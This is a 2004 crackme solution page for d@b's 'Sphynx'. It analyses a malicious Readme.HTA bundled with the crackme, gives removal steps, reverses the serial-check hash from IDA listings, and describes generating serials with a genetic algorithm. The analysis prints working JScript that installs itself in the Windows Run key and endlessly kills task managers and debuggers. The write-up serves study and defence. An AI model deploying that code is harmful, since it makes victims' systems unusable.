<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<!--
  (c) 2004, elfz

  In case you wonder, this was written by hand in a FAR file manager's default editor with a colourer plugin.
  This XHTML document was written in a little bit more than two hours, and is a valid XHTML 1.0 Strict document.

-->

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
  <meta http-equiv="Content-Type" content="text/html; charset=windows-1257" />
  <title>elf'z solution for d@b-Sphynx</title>
  <style type="text/css">
    body {
      font-family: "Trebuchet MS", georgia, verdana, sans-serif;
      font-size: 90%;
      margin: 30px;
      background-color: #eee;
    }

    #content {

      margin-top: 0;
      margin-left: 2px;
      margin-right: 2px;
      padding: 10px;
      background-color: #fff;
      border: 1px solid #999;
      border-top: 0;
      

    }
    .footer {
      text-align:right;
      font-style: italic;
      font-size: 80%;
    }

    #header {
      border: 1px solid #666;
      border-left: 2px solid #000;
      background-color: #ffe;
      font-family: courier new, courier, monospace;
      padding: 5px;
    }
    #header a {
      font-weight: bold;
      text-decoration: underline;
      color: #009;
    }
    h1 {
      font-size: 200%;
      margin-top: 20px;
      margin-bottom: 10px;
    }
    p {
      margin: 0;
      padding-left: 20px;
      padding-right: 20px;
      margin-top: 8px;
      margin-bottom: 8px;
      text-align: justify;
    }
    code {
      font-family: courier new, courier, monospace;
    }
    pre {
      margin-left: 40px;
      margin-right: 40px;
      padding: 10px;
      border: 1px solid #bbb;
      border-left: 2px solid #bbb;
      overflow: auto;
      font-family: courier new, courier, monospace;
      font-size: 80%;
    }
    .comment, .int {
      color: #090;
    }
    .param, .var {
      color: #00f;
    }
    .important {
      color: #900;
      font-weight: bold;
    }
    .func {
      color: #f0f;
    }
    .text {
      color: #999;
    }
    .olly {
      margin-left: 40px;
      margin-top: 20px;
      margin-bottom: 20px;
      border-collapse: collapse;
    }
    .olly th {
      border: 1px solid #333;
      background-color: #ccc;
    }
    .olly td {
      border-left: 1px solid #999;
      border-right: 1px solid #999;
    }
    .olly td, .olly th{
      padding-left: 3px;
      padding-right: 3px;
      font-family: courier new, courier, monospace;
      text-align: left;
    }
    #greets {
      margin-top: 50px;
      border: 1px solid #999;
      background-color: #efe;
      text-align: center;
      font-family: courier new, courier, monospace;
    }
    .unimportant {
      color: #ccc;
    }
    .unimportant .int {
      color: #ccc;
    }
    .cstring {
      color: #c33;
    }
    .cfunc {
      color: #33c;
    }

    abbr {
      font-family: courier new, courier, monospace;
      background-color: #ffe;
      border-bottom: 1px solid #ee0;
    }



  </style>
</head>

<body>

    <div id="header">
      Target:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <a href="http://www.crackmes.de/download.php/Sphynx.zip?Crackme=960">d@b's &quot;Sphynx&quot;</a><br />
      Provided by: <a href="http://www.crackmes.de/">crackmes.de</a><br />
      Solved by: &nbsp;&nbsp;<a href="http://elfz.laacz.lv">elfz</a>@laacz.lv<br />
      Category: &nbsp;&nbsp;&nbsp;serial<br />
      Difficulty: &nbsp;3<br />
      Protection: &nbsp;wicked holy sick shit<br />
    </div>
    <div id="content">
<h1>Preface / warning</h1>
<p>Here we are dealing with very very very bad protection practices. Never EVER do the protections like this. EVER. This is a <strong>virus</strong>, not a protection.</p>
<p>Anyway, it will show some logical and genetic approach for solving the math part of the <del>virus</del> crackme.</p>

<h1>The virus part</h1>
<p>Upon the extraction of the ZIP archive, you should immediately notice the Readme.HTA file. If you have had any experiences with HTA then you probably know that the files with this extension do more bad than good; I have yet to see a just reason for using these files. So, before even taking a look at the crackme, take a look at it with your favourite text editor (and, for god's sake, don't double-click it). </p>
<p>An excerpt from the file:</p>
<pre>
function <span class="cfunc"><strong>Start</strong></span>(){
  try{
    window.<span class="cfunc">setTimeout</span>(<span class="cstring">"CreateScripts()"</span>,50,<span class="cstring">"Javascript"</span>);
  }catch(e){}
}

function <span class="cfunc"><strong>CreateScripts</strong></span>(){
  hkey        = <span class="cstring">"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\"</span>;
  var shell   = new <span class="cfunc">ActiveXObject</span>(<span class="cstring">"WScript.Shell"</span>);
  var fso     = new <span class="cfunc">ActiveXObject</span>(<span class="cstring">"Scripting.FileSystemObject"</span>);
  var oFolder = fso.<span class="cfunc">GetSpecialFolder</span>(2) + <span class="cstring">"\\"</span>;
  var oFile, oScript;
  		
  oScript = window.document.<span class="cfunc">getElementById</span>(<span class="cstring">"scSphynxDog"</span>).innerHTML;
  oFile   = fso.<span class="cfunc">OpenTextFile</span>( (oFolder + <span class="cstring">"scSphynxDog.js"</span>) , 2 , true , 0 );
  oFile.<span class="cfunc">Write</span>(<span class="cstring">"WatchDog();"</span>);
  oFile.<span class="cfunc">Write</span>(oScript);
  oFile.<span class="cfunc">Close</span>();
  shell.<span class="cfunc">Run</span>( (oFolder + <span class="cstring">"scSphynxDog.js"</span>) , 0 ,false );

  shell.<span class="cfunc">RegWrite</span>( hkey + <span class="cstring">"Sphynx"</span> , (oFolder + <span class="cstring">"scSphynxDog.js"</span>) , <span class="cstring">"REG_SZ"</span> );
}
</pre>
<p>The workload of this fragment of code is to set the timer to execute <code>CreateScripts</code> function after 50ms. So, <code>CreateScripts</code> function is called, and it creates a file in your <code>TEMP</code> folder (returned by <code>GetSpecialFolder(2)</code>) called <code>scSphynxDog.js</code> and adds this file to autostart on every windows boot to make things worse.</p>
<p> The contents of this file are contained in the HTML element with id <code>&quot;scSphynxDog&quot;</code>, and it just happens to be another script:</p>
<pre>
function <span class="cfunc"><strong>WatchDog</strong></span>(){
  try{	
    while (true){
      <span class="cfunc">EndProc</span>(<span class="cstring">"TASKMGR"</span>);
      <span class="cfunc">EndProc</span>(<span class="cstring">"MMC"</span>);
      // ...
      // ...
      <span class="cfunc">EndProc</span>(<span class="cstring">"FILEMON"</span>);
      <span class="cfunc">EndProc</span>(<span class="cstring">"SPY"</span>);
      WScript.<span class="cfunc">Sleep</span>(1000);
    }
  }catch(e){}
}

function <span class="cfunc"><strong>EndProc</strong></span>(proc){
  try{
    var locator   = new <span class="cfunc">ActiveXObject</span>(<span class="cstring">"WbemScripting.SWbemLocator"</span>);

    locator.Security_.Privileges.<span class="cfunc">Add</span>(19);
    
    var connector = locator.<span class="cfunc">ConnectServer</span>(<span class="cstring">"."</span>);
    var str       = <span class="cstring">"SELECT * FROM Win32_Process WHERE Name LIKE '%"</span> + proc + <span class="cstring">"%'"</span>;
    var process   = connector.<span class="cfunc">ExecQuery</span>(str);
    var e         = new <span class="cfunc">Enumerator</span>(process);

    for ( ; !e.<span class="cfunc">atEnd</span>() ; e.<span class="cfunc">moveNext</span>() ){
      e.<span class="cfunc">item</span>().<span class="cfunc">Terminate</span>();
    }		
  }catch(e){}
}
</pre>
<p>Even if you haven't written any javascript and haven't played with Windows scripting, you can quickly guess what these functions do. Oh yes, they are killing the processes that contain the blacklisted texts in their names - it means command shell, registry editors, (olly)debuggers; you name it - we kill it. Kills all the time, monitoring the processes over and over.</p>
<p>To make things worse, as you probably remember, this shit is set to be started upon every windows run, thus rendering your windows system absolutely unusable.</p>
<p>To disguise itself as a legit program, it displays contents of readme.txt in the frame, to fool you into thinking that that's the purpose of this file.</p>
<h1>Disinfection</h1>
<p>Before running &quot;crackme&quot; for the first time, just delete the <code>Readme.HTA</code> file. You can do it safely, as the program won't check for it's existence.</p>
<p>In case you already have run the program and are infected: if you have any task manager (not the default one), which wouldn't be killed by the script, kill the process <code>&quot;WScript.exe&quot;</code>.</p>
<p>If you can't kill the process, then you can try to go to Start menu - run, and type <abbr>del %TEMP%\scSphynxDog.js</abbr>, and restart your computer.</p>
<p>After getting rid of the script either way, clean out the registry and delete that damned HTA file.</p>
<h1>The crackme itself</h1>
<p>As usual, load the crackme into IDA (do I have to  show you how to do that?) I assume that you'll be able to find a call to GetDlgItemTextA without my help.</p>
<pre>
.text:00401096                 call    <span class="var">GetDlgItemTextA</span>
.text:0040109B                 cmp     eax, <span class="int">1</span>
.text:0040109E                 mov     <span class="var">serialLength</span>, eax
.text:004010A3                 jge     short loc_4010A7
.text:004010A5                 jmp     short <span class="text">leave_proc</span>
.text:004010A7 <span class="comment">; ---------------------------------------------------------------------------</span>
.text:004010A7 
.text:004010A7 loc_4010A7:                             <span class="comment">; CODE XREF: DialogFunc+57&uarr;j</span>
.text:004010A7                 call    <span class="var">IsDebuggerPresent</span>
.text:004010AC                 cmp     eax, <span class="int">0</span>
.text:004010AF                 jnz     short <span class="text">die_with_debugbreak</span>
.text:004010B1                 mov     eax, <span class="var">serialLength</span>
.text:004010B6                 xor     ecx, ecx
.text:004010B8                 xor     edx, edx
.text:004010BA                 xor     edi, edi
.text:004010BC 
.text:004010BC loc_4010BC:                             <span class="comment">; CODE XREF: DialogFunc+7E&darr;j</span>
.text:004010BC                 movsx   edi, <span class="var">lpSerial</span>[ecx]
.text:004010C3                 adc     edx, edi
.text:004010C5                 rcl     edx, <span class="int">1</span>
.text:004010C7                 inc     ecx
.text:004010C8                 cmp     ecx, eax
.text:004010CA                 jnz     short loc_4010BC
.text:004010CC                 mov     ds:dword_401104, edx <span class="important">; (1)</span>
.text:004010D2                 cmp     edx, <span class="int">19372h</span>
.text:004010D8                 jz      short <span class="text">goodBoy</span>
</pre>
<p>Looks like a simple check for the debugger and a simple hash function, and the hash of the password should be 19372h? Would you bet money on that? Look closer again. If you look carefully, you may notice that after the hash is calculated, it is stored&hellip; yes, where is it stored? IDA says that this variable <span class="important">(1)</span> is in data segment, see the <code>ds:</code> prefix? But data section isn't writable! So this will trigger an unhandled exception, just like it was done in one of my crackmes (that's why I know this so well, and I couldn't help but notice that d@b has solved that my crackme just recently. I hope that's a coincidence). </p>
<p>Take a look at the exception handler, you shouldn't have trouble finding it, it's just below this function:</p>
<pre>
.text:00401108 <span class="var">; LONG __stdcall TopLevelExceptionFilter(struct _EXCEPTION_POINTERS *)</span>
.text:00401108 <span class="var">TopLevelExceptionFilter proc near       ; DATA XREF: start&uarr;o</span>
.text:00401108 <span class="unimportant">                mov     esi, [ebp+8]    </span><span class="comment">;</span>
.text:0040110B <span class="unimportant">                mov     eax, [esi+4]    </span><span class="comment">;</span>
.text:0040110E <span class="unimportant">                add     eax, 0B8h       </span><span class="comment">;</span>
.text:00401113 <span class="unimportant">                mov     esi, eax        </span><span class="comment">; execution flow fix-up</span>
.text:00401115 <span class="unimportant">                mov     eax, [eax]      </span><span class="comment">;</span>
.text:00401117 <span class="unimportant">                add     eax, 0Eh        </span><span class="comment">;</span>
.text:0040111A <span class="unimportant">                mov     [esi], eax      </span><span class="comment">;</span>
.text:0040111C                 mov     eax, <span class="var">serialLength</span>
.text:00401121                 xor     ecx, ecx
.text:00401123                 xor     edx, edx
.text:00401125                 xor     edi, edi
.text:00401127 
.text:00401127 loc_401127:                             <span class="comment">; CODE XREF: TopLevelExceptionFilter+39&darr;j</span>
.text:00401127                 movsx   edi, <span class="var">lpSerial</span>[ecx]
.text:0040112E                 add     edx, <span class="int">12345678h</span>
.text:00401134                 rcl     edx, <span class="int">1</span>
.text:00401136                 adc     edx, edi
.text:00401138                 add     edx, <span class="int">87654321h</span>
.text:0040113E                 inc     ecx
.text:0040113F                 cmp     ecx, eax
.text:00401141                 jnz     short loc_401127
.text:00401143                 cmp     edx, <span class="int">0C3B42A38h</span>
.text:00401149                 jnz     short <span class="text">leave_filter</span>
.text:0040114B <span class="unimportant">                xor     ecx, ecx        </span><span class="comment">; good boy message decryption starts here</span>
</pre>
<p>Eureka! This is the REAL hash function. Now we just need to find a way to generate the serials to its liking.</p>
<h1>Hash function analysis</h1>
<p>To understand the hash function better, let's follow it step by step a little. What will be its value after first iteration? After second? And so on. Maybe we can see something.</p>
<p>As initial hash value is 0, then:</p>
<pre>
.text:00401127                 movsx   edi, <span class="var">lpSerial</span>[ecx]  <span class="comment">; hash = 0</span>
.text:0040112E                 add     edx, <span class="int">12345678h</span>      <span class="comment">; hash = 12345678h</span>
.text:00401134                 rcl     edx, <span class="int">1</span>              <span class="comment">; hash = 2468ACF0h</span>
.text:00401136                 adc     edx, edi            <span class="comment">; hash = 2468ACF0h + serial[0], no carry in the previous operation</span>
.text:00401138                 add     edx, <span class="int">87654321h</span>      <span class="comment">; hash = 2468ACF0h + serial[0] + 87654321h = 0ABCDF011h + serial[0]</span>
</pre>
<p>Step 2:</p>
<pre>
.text:00401127                 movsx   edi, <span class="var">lpSerial</span>[ecx]  <span class="comment">; hash = 0ABCDF011h + serial[0]</span>
.text:0040112E                 add     edx, <span class="int">12345678h</span>      <span class="comment">; hash = 0BE024689h + serial[0]</span>
.text:00401134                 rcl     edx, <span class="int">1</span>              <span class="comment">; hash = 7C048D12h + serial[0]&lt;&lt;1, carry set</span>
.text:00401136                 adc     edx, edi            <span class="comment">; hash = 7C048D12h + serial[0]&lt;&lt;1 + serial[1] + 1</span>
.text:00401138                 add     edx, <span class="int">87654321h</span>      <span class="comment">; hash = 0369D034h + serial[0]&lt;&lt;1 + serial[1]</span>
</pre>
<p>We see that there's no way that we can get hash to be <code>0C3B42A38h</code> with one- or two-letters serial, it's just impossible. But how many bytes do we need to get this hash? Let's forget about that carry flag and pretend that there's shl instead of rcl, and add instead of adc, and examine the approximate values on each iteration:</p>
<pre>
 1) 0abcdf011h + s[0]
 2) 00369d033h + s[0]&lt;&lt;1  + s[1]
 3) 0b2a19077h + s[0]&lt;&lt;2  + s[1]&lt;&lt;1 + s[2]
 4) 0111110ffh + s[0]&lt;&lt;3  + s[1]&lt;&lt;2 + s[2]&lt;&lt;1 + s[3]
 5) 0cdf0120fh + s[0]&lt;&lt;4  + s[1]&lt;&lt;3 + s[2]&lt;&lt;2 + s[3]&lt;&lt;1 + s[4]
 6) 047ae142fh + s[0]&lt;&lt;5  + s[1]&lt;&lt;4 + s[2]&lt;&lt;3 + s[3]&lt;&lt;2 + s[4]&lt;&lt;1 + s[5]
 7) 03b2a186fh + s[0]&lt;&lt;6  + s[1]&lt;&lt;5 + s[2]&lt;&lt;4 + s[3]&lt;&lt;3 + s[4]&lt;&lt;2 + s[5]&lt;&lt;1 + s[6]
 8) 0222220efh + s[0]&lt;&lt;7  + s[1]&lt;&lt;6 + s[2]&lt;&lt;5 + s[3]&lt;&lt;4 + s[4]&lt;&lt;3 + s[5]&lt;&lt;2 + s[6]&lt;&lt;1 + s[7]
 9) 0f01231efh + s[0]&lt;&lt;8  + s[1]&lt;&lt;7 + s[2]&lt;&lt;6 + s[3]&lt;&lt;5 + s[4]&lt;&lt;4 + s[5]&lt;&lt;3 + s[6]&lt;&lt;2 + s[7]&lt;&lt;1 + s[8]
10) 08bf253efh + s[0]&lt;&lt;9  + s[1]&lt;&lt;8 + s[2]&lt;&lt;7 + s[3]&lt;&lt;6 + s[4]&lt;&lt;5 + s[5]&lt;&lt;4 + s[6]&lt;&lt;3 + s[7]&lt;&lt;2 + s[8]&lt;&lt;1 + s[9]
11) 0c3b297efh + s[0]&lt;&lt;10 + s[1]&lt;&lt;9 + s[2]&lt;&lt;8 + s[3]&lt;&lt;7 + s[4]&lt;&lt;6 + s[5]&lt;&lt;5 + s[6]&lt;&lt;4 + s[7]&lt;&lt;3 + s[8]&lt;&lt;2 + s[9]&lt;&lt;1 + s[10]
</pre>
<p>Although the actual values will be slightly different, as we haven't taken into account the fact that carry flag is used in the calculations, we see that in 11-th iteration there's a number VERY close to the required one, so we can deduce that the serial should be at least 11 chars long (in fact, it can be larger - starting with length of ~24 bytes, the whole bits of hash will be covered with the bits of serial, and there'll be chance to get the required serial again).</p>
<p>Also, by changing one bit in the serial, the hash value changes slightly - well, here we have a nice candidate for a simple genetic algorithm for generating the valid serials.</p>
<h1>Gene power</h1>
<p>I'll use the same idea which Merkuur used in solving <a href="http://www.crackmes.de/crackmeinfo.php?ID=231">Cruehead's Crueme</a> crackme (because I've already rewritten that to a reusable template for this approach, and this is a nice place to use it).</p>
<p>You can read more about the algorithm in the <a href="http://www.crackmes.de/download.php/cruesol.zip?Solution=311">original solution</a> of Merkuur, but the basic idea is to generate a bunch of random serials, and see which of them generate the most alike hash. From these serials we keep the best ones, and mutate the other ones - mutate by changing some random byte to some random value, or "borrow" some random byte with the byte from the "good ones"; repeat this process until we find (or don't find) a good serial.</p>
<p>If you're good with C++, you can read my source, and probably even use it for other calculations - I tried to make it quite reusable.</p>
<h1>Final thoughts</h1>
<p>This is also a valid serial: <abbr>oooOOOOoO0o0o0OOOoo0Ooo0OO0o0o0Oo00oO00oooOO0oOOo00oo0O0o0O0oOoO</abbr></p>
<p>Genetic algos kick ass. Will definitely learn more about them.</p>
<p>Shame to d@b for the HTA stuff.</p>
<p>If you're using XP and see the HTAs like this, and they <strong>definitely</strong> have to be run (file checks, CRC checks etc), execute them by using right-mouse-click - Run As... and check the box "Protect my computer&hellip;" - the bad things will be effectively defeated.</p>
<p>Feel free to contact me with questions/remarks/whatever by mail - <a href="mailto:elfz@laacz.lv">elfz@laacz.lv</a>, or by using MSN (elfz@laacz.lv).</p>
<p id="greets">no greetings today</p>
    </div>

<p class="footer">written-by-hand&trade;</p>

                                                                                                                                                                                                                           
</body>
</html>